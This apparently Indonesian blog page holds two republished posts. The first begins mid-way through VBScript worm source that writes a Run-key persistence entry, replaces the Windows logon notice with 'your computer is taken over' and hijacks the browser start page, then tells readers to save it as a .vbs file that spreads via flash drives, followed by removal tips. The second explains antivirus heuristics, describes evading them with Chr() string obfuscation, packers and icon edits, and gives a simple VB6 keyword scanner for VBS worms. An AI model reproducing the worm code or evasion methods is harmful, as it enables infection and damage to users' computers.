kalong.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText", "Komputer Anda Diambil Alih"

'Aktifkan saat Windows Startup
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia", syspath & "\recycle.vbs"

'Ubah Default Start Page Internet Explorer
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.vaksin.com"

'Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname

simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik)

secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.

Adapun cara menanggulangi virus tersebut yaitu dengan cara

- tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK

- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut

- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)

- setelah itu, file tersebut dihapus/di delete dari komputer

semoga tulisan ini, bisa bermanfaat dan berguna untuk semua orang.

sumber:7up3r1

Jasakom

MiztaPEE

Read more.....

Teknik Heuristik Pada Antivirus

Teknik heuristik merupakan teknik yang dipakai antivirus untuk mendeteksi keberadaan virus2 baru atau yang belum terdapat di signature antivirus tersebut. Bagaimana caranya? Tentunya setiap antivirus memiliki cara sendiri2. Kita ambil contoh antivirus (yang lokal2 aja ya..) Ansav +E Advanced 1.7.8 (ga tau klo ada versi barunya) , av ini mengusung "Advanced Ansav Heuristic Engine". Pada AAHE ini, Ansav akan mendeteksi suatu file sebagai ancaman dengan dengan membandingkan suatu signature dengan entrypoint/PE Header pada body file. Yah kurang lebih begitu. Sedangkan pada PCMAV rc23, heuristik andalannya yaitu dengan mengecek jika suatu file mempunyai signature suatu icon tertentu. Maksudnya jika kita membuat program yang mengandung icon folder (baik sebagai icon file atau resource) maka PCMAV akan menganggap file tersebut sebagai ancaman.

Namun teknik-teknik heuristik tersebut dapat dilewati/ heuristic bypassing dengan mudah, misalnya pada Ansav, kita dapat memakai program packer2 yang tidak terdapat di "database" heuristiknya Ansav. Sedangkan pada PCMAV, ya.. paling gampang tinggal ga pake icon2 yang dianggap ancaman (icon folder, word dsb) atau mengubah struktur body icon memakai program hex editor (namun hati2 biar icon ga berubah gambar)

Pada kesempatan ini saya akan membahas teknik heuristik untuk mendeteksi worm VBS. Ini karena penasaran sama PCMAV yang selau aja jitu menebak VBS worm. Ceritanya ketika teman saya minta bersihiin virus, truz ternyata terdeteksi sebagai worm oleh antivirus luar di pc saya, iseng pengen nyoba kehebatan antivirus saya tersebut, saya mencoba mengenkripsi worm tersebut, dimana tulisan "Scripting.FileSystemObject" saya enkripsi menjadi Chr(83) + Chr(99) + Chr(114) + Chr(105) + Chr(112) + Chr(116) + Chr(105) + Chr(110) + Chr(103) + Chr(46) + Chr(70) + Chr(105) + Chr(108) + Chr(101) + Chr(83) + Chr(121) + Chr(115) + Chr(116) + Chr(101) + Chr(109) + Chr(79) + Chr(98) + Chr(106) + Chr(101) + Chr(99) + Chr(116)

Tadaaa... ternyata antivirus saya tidak mampu mendeteksinya... Kemudian teringat PCMAV (soalnya pernah baca diweb resminya klo PCMAV punya heuristik canggih buat mendeteksi file VBS). Pas discan pake PCMAV ternyata terdeteksi. Ya udah saya enkripsi semua string. Ehhh ternyata masih terdeteksi... hebat2... ini antivirus punya paranoid heuristik Setelah saya teliti2 hampir seribu detik, ternyata heuristiknya PCMAV yaitu dengan mendeteksi beberapa tulisan yang tidak mungkin tidak dipakai oleh suatu worm, yaitu salah satunya kombinasi command "CreateObject" dan "wscript.scriptfullname". Tulisan ini gimana ya enkripsinya?? soalnya tipe tulisan ini bukanlah string, melainkan command internal pada VBS. Klo di Delphi command2 mungkin bisa dienkripsi,itu mungkin juga cuma command2 yang memakai API misalnya "UrlDownloadToFile" dimana memanggil dari file urlmon.dll. Yah main2in memory (GetProcAddress).

Tapi, saya ga akan membahas bagaimana caranya heuristic bypassing, malez bo klo banyak virus canggih, ntar klo ada cewek minta tolong saya bersiin pcnya dan saya ga bisa kan.. giiitu dech... Ok.. lanjut, kita kita akan bikin program dasar untuk mendeteksi worm VBS.

Yang kita perlukan adalah VB6 dan :
Komponen dan nama

TextBox : Text1

CommandButton : Command1
CommandButton : Command2
CommonDialog : CommonDialog1

Pada Command1 isikan :

CommonDialog1.Filter = "VBS File (*.vbs)|*.VBS"
CommonDialog1.ShowOpen
If CommonDialog1.FileName = "" Then Exit Sub
Text1.Text = CommonDialog1.FileName

Pada Command 2 isikan :

Vbs_Checker Text1.Text

Kemudian buat fungsi sebagai berikut :


Public Function Vbs_Checker(ByVal target As String)

If target = "" Then Exit Function
If Dir$(target) = "" Then Exit Function

On Error Resume Next

Open target For Input As #1
While EOF(1) = False
DoEvents

Line Input #1, maltext
maltext = " " & maltext
maltext = LCase(maltext)

If InStr(maltext, "createobject") > 0 Then GoSub warning
If InStr(maltext, "regwrite") > 0 Then GoSub warning
If InStr(maltext, "wscript.scriptfullname") > 0 Then GoSub warning
If InStr(maltext, "ActiveDocument.Shapes.AddOLEObject") > 0 Then GoSub warning

Wend

Exit Function

warning:
MsgBox "Suspected command : " & maltext, vbExclamation, "Warning"
Return
End Function


Seharusnya kode2 di atas self explained, tapi saya jelasin lagi deh buat pemula kaya saya. Inti dari program tersebut yaitu membaca file VBS yang kita pilih dan membandingkan isi file VBS dengan tulisan tertentu, misalnya "createobject". Jika ketemu tulisan tersebut maka keluar peringatan.

Sekali-lagi, kode2 di atas hanyalah konsep untuk mendeteksi worm VBS. Mungkin lebih baik dengan membandingkan lebih dari satu kata untuk mencegah indikasi false alarm.

Demikianlah (kaya nutup pidato aja), mudah2an ada manfaatnya buat yang baca.

Original Text by Fajar :: anggiawan.web.id

Republish by MiztaPEE

Read more.....